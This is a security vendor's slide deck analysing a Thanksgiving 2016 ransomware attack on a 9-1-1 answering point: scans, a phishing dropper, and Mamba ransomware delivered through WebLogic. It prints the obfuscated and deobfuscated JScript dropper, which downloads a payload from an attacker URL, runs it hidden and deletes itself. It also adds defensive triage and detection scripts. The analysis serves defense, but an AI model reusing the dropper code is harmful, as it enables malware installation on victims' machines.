PSAP Cyber Attack: A Thanksgiving Story
Cybersecurity for Public Safety Timothy Lorello – President & CEO of SecuLore Solutions
“We Protect Our Nation’s Most Important Number: 9-1-1!”
Tim Lorello - CEO
• Former CMO (TCS)
• 15+ years public safety
• 5+ years cybersecurity
• 30+ years telecomm
• Guidance to FCC
• BA Physics, MSEE
• 20 patents
Presenter
Free Thanksgiving Rides in San Francisco – Reprise for a PSAP
Recent PSAP Attacks
Setting the Stage
Before Thanksgiving
Thanksgiving Fog
No Turkey Dinner for You
Thanksgiving Blessings – Lessons Learned
Q&A
Agenda
‘You Hacked,’ Cyber Attackers Crash Muni Computer System Across SF (CBS SF Bay Area, 11/26/2016)
Hackers Breached San Francisco’s Transit System and Demanded a Ransom (Slate Future Tense, 11/28/2016)
It Looks Like the San Francisco Muni Hack Was Worse Than We Thought (Gizmodo, 11/28/2016)
Hackers Threaten to Release 30GB of Stolen Data From San Francisco’s Municipal Railway (Fortune, 11/28/2016)
Security analysts: Muni hack should be wake-up call to other agencies (East Bay Times, 11/28/2016)
San Francisco Rail System Hacker Hacked (KrebsOnSecurity, 11/29/2016)
SF Muni hack contained. Next transit hack could be train wreck (C|Net – 11/29/2016)
San Francisco Railway ‘Never Considered Paying the Ransom’ To Hackers (Fortune, 11/29/2016)
The Great Train Robbery, cybercrime style – Free Rides in San Francisco!
5 05/16/2017
Collinsville [Alabama] Police Department Hit by Ransomware Trojan (6/2014)
Virus Wipes Out [New Hampshire] Police Department’s Computers (6/2014)
Cyber attack temporarily shut down Newark [New Jersey] police computer systems (6/2014)
Dickson [Tennessee] Sheriff’s Office pays ransom to cyber criminals (11/2014)
Suburban Chicago [Illinois] PD Forced To Pay A Hacker $500 Ransom For Its Own Files (2/2015)
Tewksbury [Massachusetts] Police Department Pays $500 Bitcoin Ransom to Hackers (4/2015)
Bitcoin ransom paid for Lincoln County [Maine] police data blocked by computer virus (4/2015)
Recent PSAP Attacks – Momentum (2014 & 2015)
Janesville [Wisconsin] computer systems hit by virus, likely ‘ransomware’ (1/2016)
[Arizona] Superior Court Attacked By Ransomware (2/2016)
Melrose [Massachusetts] Police Pay 1 Bitcoin to Get Rid of Ransomware (2/2016)
Medfield [Massachusetts] paid hackers a $300 ransom to ‘unlock’ the town network (2/2016)
City of Durham [North Carolina] avoids ransomware threat by backing up data (2/2016)
Alto [Texas] city office battles ransomware issue (3/2016)
Ransomware virus infects Pinal County [Arizona] Attorney’s Office case files (5/2016)
Hackers hit upstate [New York] municipalities with ransomware (5/2016)
Hackers hit Larimer County [Colorado], services impacted (6/2016)
Town of Palm Beach [Florida] fights ransomware attack on 911 system (6/2016)
Virus hits Prior Lake [Minnesota] server; resident data not likely breached (6/2016)
Recent PSAP Attacks – Momentum (1H2016)
Woodbury County [Iowa] Ransomware Attack Leaves Thousands of Files Compromised (7/2016)
Wadena City [Minnesota] computers infected with virus (7/2016)
[Florida] City of Sarasota's system hacked by ransomware, data held hostage (8/2016)
City takes swift action after ransomware infects Honolulu [Hawaii] Fire Department computers (9/2016)
Crow Wing County [Minnesota] Board: Back up or pay up: County fights against ransomware (9/2016)
Springfield [Tennessee] City Hall recovers from ransomware attack (9/2016)
Palmhurst [Texas] Police Department Avoids Data Loss (9/2016)
Mount Holly Springs [Pennsylvania] police fall victim to cyber attack (10/2016)
Ransomware Result: Free Ticket to Ride in San Francisco [California] (11/2016)
Ransomware targets Howard County [Indiana] government (11/2016)
Madison Co. [Indiana] government servers fall victim to hackers, ransomware (11/2016)
[Arkansas] sheriff's office hit by ransomware pays hackers (12/2016)
Mount Pleasant [South Carolina] Police Department hit with ransomware cyberattack (12/2016)
Recent PSAP Attacks – Momentum (2H 2016)
[Network diagram: the PSAP network sits behind a router and firewall, with its web server, the ISP for e-mail, the ISP for web, and the call-taker workstations (WS); SecuLore sensors monitor inside traffic and outside traffic with full data capture, and alerts are sent to the SOC]
4 Layers of Protection:
• Web reputation
• Firewall
• Email antispam
• Workstation antivirus (AV on every workstation)
Setting the Stage – A County Prepared
Setting the Stage – Timeline of Suspicious Activity
[Timeline figure, 11/22 1600 through 11/24 2000]
SecuLore Monitoring begins: 11/22 1610
Suspicious scans noticed: 11/22 1641
Last suspicious scan noticed: 0751
SecuLore Monitoring ends: 11/24 2058
Before Thanksgiving – The Vulnerability Scans
[Diagram: the hacker rents an exploit kit and a "Command and Control" server, then reaches the Public Safety Answering Point through its network provider; inside the PSAP are the IT network, administrative staff, call takers, public safety datasets, and logs]
Attacker may:
1) Probe the network
2) Send continuous interrogations
3) Send continuous phishing attacks
An email attack, intended to cause the victim to make a selection, installs malware on the victim's machine.
Ransomware: It Starts with Finding a Way In
Step One: The Scan
4 countries associated with this hacker's MO
Thanksgiving PSAP Attack: Vulnerability Scan
Date-Time        IP Address        Location                    Enterprise
11/22-11:41:09   37.27.240.82      Tehran, Iran                Pars Online PJS
11/22-11:52:07   134.255.200.168   <Unknown>, Iran             Pars Online PJS
11/22-13:00:38   151.235.157.24    <Unknown>, Iran             Information Technology Company (ITC)
11/22-13:27:59   37.98.224.225     Karkh, Iraq                 ScopeSky Communication and Internet Ltd.
11/22-13:36:25   5.78.254.96       Tehran, Iran                Pars Online PJS
11/22-13:36:25   122.160.165.154   Faridabad, India            Bharti Airtel Ltd., Telemedia Services
11/22-13:40:36   125.63.83.212     Borivali West, India        CITYCOM NETWORKS PVT LTD
11/22-14:10:33   188.212.79.86     Arak, Iran                  Telecommunication Infrastructure Company
11/22-15:02:18   188.212.197.158   Bucharest, Romania          Massive Telecom SRL
11/22-15:53:46   109.230.251.7     Tehran, Iran                Pars Online PJS
11/22-16:27:06   85.114.138.63     Shadabad, Iran              Respina Networks & Beyond PJSC
11/22-16:43:28   85.114.138.63     Ho Chi Minh City, Vietnam   Viettel Corporation
11/22-22:39:47   115.78.4.236      Ho Chi Minh City, Vietnam   Viettel Corporation
11/22-22:41:50   115.78.162.144    Ho Chi Minh City, Vietnam   Viettel Corporation
11/22-22:41:50   45.115.107.133    Noida, India                Ultranet services private limited
11/22-22:52:29   151.235.188.66    Tehran, Iran                Information Technology Company (ITC)
11/22-22:52:29   5.123.250.13      <Unknown>, Iran             Iran Cell Service and Communication Company
<continues>      <continues>       <continues>                 <continues>
11/23-07:51:07   122.171.176.182   Bengaluru, India            Bharti Airtel Ltd., Telemedia Services
(The 11/22-16:43:28 row repeats the IP 85.114.138.63 with a different location, as printed on the slide.)
The Vulnerability Scan: Suspicious IPs
[Timeline figure, 11/22 1600 through 11/24 2000]
SecuLore Monitoring begins: 11/22 1610
Suspicious scans noticed: 11/22 1641
Last suspicious scan noticed: 0751
Phishing email starts: 0537
Phishing email last: 0738
Phish to Target A: 1316
Target A infected: 1339
SecuLore Monitoring ends: 11/24 2058
The Phishing Attack That Wasn't
Step Two: The Fake
Phishing emails came from many countries – but most from the US!
Thanksgiving PSAP Attack: The Fake
Phishing + Social Engineering = Spear Phishing
Spear Phishing + Top Dogs = Whaling
Cyber Attackers Love to Phish
Excerpt of the obfuscated JScript dropper as it arrived (the string fragments it concatenates were defined earlier in the script and are not shown on the slide):
var snodce = usakrizq + arlynsyhgyz + jolivevb2 + ijkeriqy0 + ijbihomipw + popogpi2 + zaltikihp;
var ubciwo = okotict0 + rokmoruly;
var catky = sjoracrudqi + hsujtykyrly3 + gijadul + udiplejow7;
var alatu = ilpafofwet + ywtaxnatni2;
var ivuxy = avxutqimgilp5 + boneqe0 + uvcemveryz + wexquzranvy + ragohipga1 + lcowenbism1;
var kcumsurhi = ikahetkicv9 + dazepweb + oshydzihy1 + ijpofuzdaxw9;
var lleqso = lunyltofi0 + gnawiwaz5;
var ozbipert = zedrotivl0 + ldetymlu;
var ubokbal = ukbazukne + jamwofiso;
var xixaha = jrehoqu;
var elmazfy = hrokwukgejo + yhfoqcizte6;
var ogfuwn = agovraruh + rvobmewa;
var wijne = hozmimwy6 + elkogdav0 + izywmuhlaq0 + pmyjkuse1;
var megory = arydzojib + asvycyhvuz4 + tmubitral;
var epbuml = yrqebfigw + elomgyl1;
var hwylzo = cykkiwo1;
var npaxuqb = gjagupfa + aryqigohv4 + bnyzoni6 + fewlojohy0;
var abpodg = uxryhuvxe;
var zynnaxu9 = new ActiveXObject(izpekmic1 + bxehjebucse0 + oktyromca + suqyztizv1 + bdufupvod + vserburehdu + fonryvtoqj + embyshovhaw8 + iccakbyjm0);
var jnunypno2 = zynnaxu9[[snodce][0]](alehyvpa);
switch (jnunypno2[[ubciwo][0]] > 4) {
  case true:
    var lelaxfuzsy5 = new Function(lyxexry + zahzonun6 + ozvimlibyc0 + ewpedux + evrasytyl0 + yzazym)();
    break;
}
var khohawji = qsixhirohw + rsugqosenv3 + zjifizu + setzamyng;
var kynro7 = new lelaxfuzsy5(khohawji);
var jewboha = apinejqivf2 + ucfuzusfutd + gputizaqqu + oklepewyv2 + adutoflu3;
var ilyqoz5 = seskublom7 + ypjokwuln + tygorgoqo7;
var orawjagd = exdidoc5 + ysazsigvy + kimzymgi + wuqavxuwba + fqovwihho3 + elbibogab + ircusfaqy6 + xofufwinpe0 + afosork5 + yrumgahka + vykoscu + etybbili + nvaksolomgu8 + lvejfobno9;
var azelup = qjeczerhasy + ertofudlesk + animzisqah + cevymsada5 + ydmytqon + nehhehus2 + otjiqazqecv + idojuk + eqvatokso2;
var kyppaqaze = new lelaxfuzsy5(ilyqoz5);
var uswufga0 = abpodg[[catky][0]];
kyppaqaze[[alatu][0]]();
The phishing email attachment was:
• Encoded
• Zipped, and zipped again
• Obfuscated
PSAP Successfully Phished – The Word Puzzle
// Deobfuscated dropper (the SL_ names were assigned during analysis). The quotes
// around the string literals were lost in the slide extraction and are restored here.
var SL_AXOscriptingFilesystem = new ActiveXObject("Scripting.FileSystemObject");
// Host check: only proceeds when the host returns a real absolute path (length > 4),
// which is a common way to detect script emulators that stub this call out
var SL_AbsPathName = SL_AXOscriptingFilesystem.GetAbsolutePathName(1);
switch (SL_AbsPathName.length > 4) {
  case true:
    // Obtain the ActiveXObject constructor indirectly to dodge simple string signatures
    var SL_AXO = new Function("return ActiveXObject;")();
    break;
}
var SL_XMLHTTP = new SL_AXO("MSXML2.XMLHTTP");          // HTTP client
var SL_AXOStream = new SL_AXO("ADODB.Stream");          // binary stream used to write the payload
SL_AXOStream.Open();
var SL_AXOScriptFileSystem = new SL_AXO("Scripting.FileSystemObject");
// Payload path: the temporary folder (special folder 2) plus a random temp file name
var SL_SpecialFolder = SL_AXOScriptFileSystem.GetSpecialFolder(2) + "\\" + SL_AXOScriptFileSystem.GetTempName();
// Synchronous (third argument 0) download of the second stage from the attacker's site
SL_XMLHTTP.open("GET", "http://www.gooholtan.wang/log.php?f=2.dat", 0);
SL_AXOStream.Position = 0;
SL_AXOStream.Type = 1;                                   // adTypeBinary
var SL_WShell = new SL_AXO("WScript.Shell");
SL_XMLHTTP.send();
if (SL_XMLHTTP.Status == 200) {
  SL_AXOStream.Write(SL_XMLHTTP.ResponseBody);
  SL_AXOStream.SaveToFile(SL_SpecialFolder);
  SL_AXOStream.Close();
  // Execute the downloaded file via cmd.exe in a hidden window (window style 0)
  SL_WShell.run("cmd.exe /c " + SL_SpecialFolder, 0);
}
// Delete the dropper script itself
SL_AXOScriptFileSystem.deleteFile(WScript.ScriptFullName);
PSAP Successfully Phished – Puzzle Solved
But this web site request – the download of the second stage – was blocked!
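The dropper above follows the classic download-write-execute pattern (MSXML2.XMLHTTP to fetch, ADODB.Stream to write, WScript.Shell to run). The following static triage script is an added example, not code from the presentation or from SecuLore: it looks for that pattern in a WSH/JScript file and pulls out the indicators (COM ProgIDs, URLs, hidden cmd.exe execution, self-deletion, the indirect `new Function("return ActiveXObject")` trick). The two samples embedded in it are constructed for the example: the dropper text with its quotes restored (an assumption about the original) and a benign file-reading script for contrast.

```python
import re
from dataclasses import dataclass

# Constructed sample: the deobfuscated dropper from the slides, with the string
# quotes the slide extraction stripped put back (an assumption about the original).
DROPPER_SAMPLE = r'''
var SL_AXOscriptingFilesystem = new ActiveXObject("Scripting.FileSystemObject");
var SL_AbsPathName = SL_AXOscriptingFilesystem.GetAbsolutePathName(1);
switch (SL_AbsPathName.length > 4) {
  case true:
    var SL_AXO = new Function("return ActiveXObject;")();
    break;
}
var SL_XMLHTTP = new SL_AXO("MSXML2.XMLHTTP");
var SL_AXOStream = new SL_AXO("ADODB.Stream");
SL_AXOStream.Open();
var SL_AXOScriptFileSystem = new SL_AXO("Scripting.FileSystemObject");
var SL_SpecialFolder = SL_AXOScriptFileSystem.GetSpecialFolder(2) + "\\" + SL_AXOScriptFileSystem.GetTempName();
SL_XMLHTTP.open("GET", "http://www.gooholtan.wang/log.php?f=2.dat", 0);
SL_AXOStream.Position = 0;
SL_AXOStream.Type = 1;
var SL_WShell = new SL_AXO("WScript.Shell");
SL_XMLHTTP.send();
if (SL_XMLHTTP.Status == 200) {
  SL_AXOStream.Write(SL_XMLHTTP.ResponseBody);
  SL_AXOStream.SaveToFile(SL_SpecialFolder);
  SL_AXOStream.Close();
  SL_WShell.run("cmd.exe /c " + SL_SpecialFolder, 0);
}
SL_AXOScriptFileSystem.deleteFile(WScript.ScriptFullName);
'''

# Constructed benign script for contrast: reads a local file, no network, no execution.
BENIGN_SAMPLE = r'''
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("C:\\logs\\cad.log", 1);
while (!f.AtEndOfStream) { WScript.Echo(f.ReadLine()); }
f.Close();
'''

# new X("Prog.ID") where X is ActiveXObject or any alias obtained through new Function()
PROGID_RE = re.compile(r'new\s+\w+\(\s*["\']([A-Za-z][\w.]*)["\']\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'<>)]+')
RUN_RE = re.compile(r'\.[Rr]un\(')
HIDDEN_CMD_RE = re.compile(r'\.[Rr]un\(\s*["\']cmd\.exe[^)]*,\s*0\s*\)')   # window style 0
SELF_DELETE_RE = re.compile(r'[Dd]elete[Ff]ile\(\s*WScript\.ScriptFullName\s*\)')
INDIRECT_AXO_RE = re.compile(r'new\s+Function\(\s*["\']\s*return\s+ActiveXObject')


@dataclass
class Triage:
    progids: list
    urls: list
    downloads: bool
    writes_payload: bool
    executes: bool
    hidden_window: bool
    self_deletes: bool
    indirect_activex: bool
    verdict: str


def triage_jscript(src: str) -> Triage:
    """Static triage of a WSH/JScript file for the download-write-execute dropper pattern."""
    progids = sorted({p.lower() for p in PROGID_RE.findall(src)})
    urls = URL_RE.findall(src)
    downloads = any(p.endswith("xmlhttp") for p in progids)          # MSXML2.XMLHTTP, Microsoft.XMLHTTP
    writes_payload = "adodb.stream" in progids and ".SaveToFile(" in src
    executes = "wscript.shell" in progids and RUN_RE.search(src) is not None
    stages = (downloads, writes_payload, executes)
    if all(stages):
        verdict = "dropper"
    elif sum(stages) >= 2 or (executes and HIDDEN_CMD_RE.search(src)):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return Triage(progids, urls, downloads, writes_payload, executes,
                  HIDDEN_CMD_RE.search(src) is not None,
                  SELF_DELETE_RE.search(src) is not None,
                  INDIRECT_AXO_RE.search(src) is not None,
                  verdict)


if __name__ == "__main__":
    for name, sample in (("dropper", DROPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        t = triage_jscript(sample)
        print(f"{name}: verdict={t.verdict} progids={t.progids} urls={t.urls}")
```

The extracted URL is exactly what a web-reputation layer needs to block, and the ProgID combination is what an endpoint rule can key on even when the file names and variable names are randomised, as they were in the obfuscated original.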
[Same network diagram as "A County Prepared" (router, firewall, web server, e-mail and web ISPs, call-taker workstations, the four layers of protection, and SecuLore monitoring of inside and outside traffic), now annotated with the two entry points: the employee workstation hit by the phish, and the web server that delivered Mamba]
If Not Phishing, Then What?
[Timeline figure, 11/22 1600 through 11/24 2000]
SecuLore Monitoring begins: 11/22 1610
Suspicious scans noticed: 11/22 1641
Last suspicious scan noticed: 0751
Phishing email starts: 0537
Phishing email last: 0738
Phish to Target A: 1316
Target A infected: 1339
Mamba begins: 0541
Mamba install: 0754
Mamba noticed: 1657
SecuLore Monitoring ends: 11/24 2058
No Turkey Dinner for You – The Mamba Attack
Step Three: The Strike
Time          WebLogic Attack – Brief Description   Attacker Information
11/24-07:34   Tor exit node detected                Source IP = 185.129.62.63 (Copenhagen, Denmark)
11/24-07:34   Vulnerability found                   css.jsp
11/24-07:38   Active Directory info                 "C:\temp\com.csv" uploaded to attacker
11/24-07:39   Possible target list                  "list.txt" downloaded to target
              Mamba ransomware loaded               "output.zip" downloaded to target
11/24-08:02   Status being checked                  Source IP = 46.166.148.176 (<Unknown City>, Netherlands)
11/24-08:10   Status being checked                  Source IP = 176.126.252.12 (<Unknown City>, Romania)
11/24-08:12   Status being checked                  Source IP = 81.7.13.181 (<Unknown City>, Germany)
11/24-08:34   Status being checked                  Source IP = 176.10.99.207 (<Unknown City>, Switzerland)
11/24-08:36   Status being checked                  Source IP = 168.1.6.51 (Sydney, Australia)
11/24-08:37   Status being checked                  Source IP = 193.90.12.90 (Oslo, Norway)
11/24-08:46   Status being checked                  Source IP = 199.68.196.124 (San Jose, United States)
11/24-08:55   Status being checked                  Source IP = 37.130.227.133 (<Unknown City>, UK)
11/24-11:41   Status being checked                  Source IP = 173.208.213.114 (Kansas City, United States)
11/24-12:09   Status being checked                  Source IP = 176.31.7.241 (<Unknown City>, France)
11/24-12:29   Status being checked                  "log_file.txt" Mamba file uploaded to attacker
11/24-13:33   Status being checked                  Source IP = 171.25.193.78 (<Unknown City>, Sweden)
11/24-13:57   Status being checked                  Source IP = 37.187.129.166 (<Unknown City>, France)
11/24-14:21   Status being checked                  Source IP = 216.244.66.231 (Seattle, United States)
11/24-14:35   779 bytes FTP'd to attacker           Source IP = 37.187.129.166 (<Unknown City>, France)
11/24-14:38   Last interaction detected             SecuLore monitoring removed
The attacker's apparent origin kept moving automatically, courtesy of The Onion Router (Tor): nearly every check-in arrived from a different exit node.
Case Study: The Scan – The Fake – The Strike
[Diagram: the same PSAP network (network provider, IT network, administrative staff, call takers, public safety datasets, logs), with the attacker's traffic arriving from a different Tor exit node each time]
Attacker kept moving to new servers (Tor exit nodes) and continued the attack.
Blocking by source IP would be very difficult; the defence has to block on behavior.
A Polymorphic Attack Vector
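The point of the slide is that a source-IP blocklist loses against an attacker who rotates Tor exit nodes, while a rule keyed on behavior does not. The script below is an added example, not code from the presentation or from SecuLore, that makes the comparison concrete on a constructed WebLogic access log: the source IPs and times are the ones listed on the slide, but the request path (/css.jsp, the resource the slide says was found vulnerable), the user agent and the two internal /index.jsp requests are assumptions made for this example. It counts what a blocklist of the first observed IP would have stopped, and then runs a behavioral rule that alerts when one request signature against a sensitive resource arrives from many distinct IPs inside a time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed WebLogic access-log lines in combined log format (not from the page).
# Source IPs and times are those listed on the slide; path, user agent and the two
# internal /index.jsp requests are assumptions made for this example.
UA = "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
ATTACKER_EVENTS = [
    ("07:34", "185.129.62.63"), ("08:02", "46.166.148.176"), ("08:10", "176.126.252.12"),
    ("08:12", "81.7.13.181"), ("08:34", "176.10.99.207"), ("08:36", "168.1.6.51"),
    ("08:37", "193.90.12.90"), ("08:46", "199.68.196.124"), ("08:55", "37.130.227.133"),
    ("11:41", "173.208.213.114"), ("12:09", "176.31.7.241"), ("13:33", "171.25.193.78"),
    ("13:57", "37.187.129.166"), ("14:21", "216.244.66.231"), ("14:35", "37.187.129.166"),
]


def _log_line(ip, hhmm, path="/css.jsp"):
    return f'{ip} - - [24/Nov/2016:{hhmm}:00 -0500] "GET {path} HTTP/1.1" 200 1422 "-" "{UA}"'


ACCESS_LOG = [_log_line(ip, t) for t, ip in ATTACKER_EVENTS] + [
    _log_line("10.10.5.21", "08:05", "/index.jsp"),   # constructed internal users
    _log_line("10.10.5.22", "08:07", "/index.jsp"),
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SENSITIVE_PATHS = {"/css.jsp"}   # the resource the slide reports the attacker hitting


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def blocklist_hits(lines, blocklist):
    """What a static IP blocklist buys you: (blocked, passed) request counts."""
    blocked = sum(1 for ln in lines if parse_line(ln)["ip"] in blocklist)
    return blocked, len(lines) - blocked


def detect_rotation(lines, window=timedelta(hours=4), min_ips=5):
    """Behavioral rule: one request signature (method, path, user agent) against a
    sensitive resource arriving from >= min_ips distinct source IPs inside `window`.
    Fires on Tor exit rotation no matter which IP the attacker uses next."""
    groups = defaultdict(list)
    for ev in map(parse_line, lines):
        if ev["path"] in SENSITIVE_PATHS:
            groups[(ev["method"], ev["path"], ev["ua"])].append(ev)
    alerts = []
    for sig, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        peak = 0
        for i, start in enumerate(evs):   # sliding window anchored at each event
            in_window = {e["ip"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            peak = max(peak, len(in_window))
        if peak >= min_ips:
            alerts.append({"signature": sig, "peak_distinct_ips": peak,
                           "total_distinct_ips": len({e["ip"] for e in evs}),
                           "first_seen": evs[0]["ts"], "last_seen": evs[-1]["ts"]})
    return alerts


if __name__ == "__main__":
    print("blocklist {first IP}: (blocked, passed) =", blocklist_hits(ACCESS_LOG, {"185.129.62.63"}))
    for a in detect_rotation(ACCESS_LOG):
        print("ALERT rotation:", a)
```

Blocking the first Tor exit node stops exactly one of the attacker's fifteen requests; the behavioral rule sees nine distinct sources hitting the same resource within four hours and fourteen over the day, which is what "blocking on behavior" means in practice. A Tor exit-node list would add a cheap second signal, but the rule above does not depend on one.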
• Employee system was compromised via an email phishing campaign – NOT the culprit!
  – The phishing campaign was conducted against multiple email addresses
  – Anti-virus software stopped approximately 38% of the attacks seen
  – One employee was tricked into opening a malicious document, infecting the machine; the workstation then reached out to download the malware payload, and that request was stopped
  – Mamba ransomware later encrypted the drive, destroying the remaining evidence
• Web Server was compromised – the actual entry point
  – Attacker used known vulnerabilities against the WebLogic server
  – Attack compromised 6 of 8 available call-taker workstations
  – Delivered "Mamba" ransomware to over 100 servers and workstations; Mamba does full-drive encryption, disabling the entire system, and it looks for and encrypts all shared storage drives as well
• Small data transfer occurred with a Russian server – seen shortly after the email phishing attack; not related to the ransomware attack
• Remote process execution service (psexecsvc.exe, PsExec) detected on various servers – not related to the ransomware attack
• Adware/malware seen on multiple systems – not suspected of malicious activity (but confusing)
Five separate malicious activities. The attack spanned 44 hours; the IT team wrestled with it for 3½ days; 3 months later, they were still recovering.
The Thanksgiving PSAP Cyber Attack: Mystery Unraveled
Patch Your Systems (vendors too!)
Train Your Staff
Keep complete/regular backups
Let Your IT Staff Show Their Abilities!
Monitor – Visualize - Protect
The Thanksgiving PSAP Cyber Attack: Lessons Learned